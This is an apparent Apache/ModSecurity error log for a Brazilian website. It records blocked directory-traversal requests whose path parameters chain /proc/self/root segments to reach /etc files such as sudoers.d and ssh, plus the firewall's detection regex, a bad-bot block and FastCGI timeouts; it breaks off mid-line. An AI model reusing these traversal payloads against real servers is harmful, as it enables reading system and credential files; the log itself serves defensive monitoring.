[Thu Mar 19 12:04:41.972757 2026] [:error] [pid 15826:tid 140411733534464] [client 74.7.241.31:34898] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwQieoXxyEfFpUF8f8WvwAAAUE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 12:04:48.133770 2026] [proxy_fcgi:error] [pid 26799:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:35254] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:04:51.617526 2026] [:error] [pid 19093:tid 140411599251200] [client 74.7.241.31:49860] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwQk1_V7PWP6ixUYl7FWAAAApE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 12:04:54.542636 2026] [:error] [pid 30077:tid 140411716749056] [client 74.7.241.31:57892] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwQlvu8EFLIOrSqIpuwmQAAAkM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 12:04:55.242928 2026] [:error] [pid 17887:tid 140411733534464] [client 74.7.243.128:33516] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwQlwkwaGbbGflqUZDN7AAAAME"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 12:04:57.042589 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.241.31:57908] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwQmNa6ubjKNq_cu4ZewgAAA04"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 12:04:59.690818 2026] [:error] [pid 19093:tid 140411716749056] [client 74.7.243.128:41200] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwQm1_V7PWP6ixUYl7FWgAAAoM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 12:05:17.127216 2026] [proxy_fcgi:error] [pid 27403:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:35884] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:05:26.927418 2026] [:error] [pid 17653:tid 140411658000128] [client 74.7.228.61:34258] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwQtsdf6f5d65gmYZSBAwAAAso"]
[Thu Mar 19 12:05:30.487672 2026] [:error] [pid 30077:tid 140411666392832] [client 74.7.241.31:54696] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwQuvu8EFLIOrSqIpuwrAAAAkk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 12:05:31.629616 2026] [:error] [pid 27293:tid 140411540502272] [client 74.7.243.128:59062] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwQu_-YZRR_7pZ7nDKUfAAAA9g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 12:05:32.855655 2026] [:error] [pid 31803:tid 140411649607424] [client 74.7.241.31:51196] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwQvOyqAr6etmhZHNppVQAAAEs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 12:05:39.385814 2026] [:error] [pid 19093:tid 140411540502272] [client 74.7.241.31:51206] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwQw1_V7PWP6ixUYl7FbgAAApg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 12:05:39.885463 2026] [:error] [pid 19093:tid 140411733534464] [client 74.7.241.31:51206] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwQw1_V7PWP6ixUYl7FbwAAAoE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 12:05:42.566925 2026] [:error] [pid 27403:tid 140411557287680] [client 74.7.241.31:60422] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwQxhkFeYa1D6dYQnD6JAAAAdY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 12:05:45.858648 2026] [:error] [pid 30077:tid 140411658000128] [client 74.7.241.31:60434] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwQyfu8EFLIOrSqIpuwswAAAko"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 12:05:48.767197 2026] [:error] [pid 27293:tid 140411658000128] [client 74.7.241.31:34610] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwQzP-YZRR_7pZ7nDKUigAAA8o"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 12:05:50.045830 2026] [proxy_fcgi:error] [pid 14269:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:36644] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:05:50.951538 2026] [:error] [pid 17653:tid 140411716749056] [client 74.7.241.31:34612] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwQzsdf6f5d65gmYZSBGAAAAsM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 12:05:55.731716 2026] [:error] [pid 30077:tid 140411666392832] [client 74.7.241.31:34622] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwQ0_u8EFLIOrSqIpuwuQAAAkk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 12:05:59.572207 2026] [:error] [pid 15826:tid 140411666392832] [client 74.7.241.31:44144] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwQ1-oXxyEfFpUF8f8W1AAAAUk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 12:06:04.131267 2026] [:error] [pid 26799:tid 140411708356352] [client 74.7.241.31:44150] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwQ3Na6ubjKNq_cu4Ze5AAAA0Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 12:06:09.867675 2026] [:error] [pid 15826:tid 140411741927168] [client 74.7.241.31:47980] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwQ4eoXxyEfFpUF8f8W2AAAAUA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 12:06:16.462845 2026] [:error] [pid 27293:tid 140411557287680] [client 74.7.241.31:47982] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwQ6P-YZRR_7pZ7nDKUkgAAA9Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 12:06:26.121773 2026] [proxy_fcgi:error] [pid 31803:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:37588] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:06:27.406890 2026] [:error] [pid 17653:tid 140411708356352] [client 74.7.241.31:45740] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri 